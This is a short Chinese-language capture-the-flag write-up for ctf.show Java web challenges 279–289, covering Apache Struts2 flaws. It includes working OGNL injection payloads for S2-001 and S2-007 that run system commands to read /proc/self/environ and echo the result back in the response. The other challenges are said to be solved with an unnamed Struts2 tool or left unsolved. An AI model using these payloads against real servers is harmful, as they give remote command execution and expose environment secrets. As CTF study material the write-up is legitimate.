• WEB279

有一句话可以点击,点击跳转

ctf_show-web入门-java-(279-289)_CTF

 

 

 看url是S2-001的漏洞,直接百度

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

输入框输入即可

不知道为啥没找到flag 直接cat /proc/self/environ

 

  • WEB280

这里网上博客讲解的很少,大都都是工具打下来的,我也是用的struts2工具

这种工具网上很多这里就不贴了

 

  • WEB281

我找的那个工具貌似没检查S2-007

这里给出脚本

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /proc/self/environ').getInputStream())) + '

 

  • WEB282

说有两种姿势,但是我是用工具的。。

 

  • WEB283

工具

 

  • WEB284

POC同S2-001

 

  • WEB285-288

工具

 

  • WEB289

没搞出来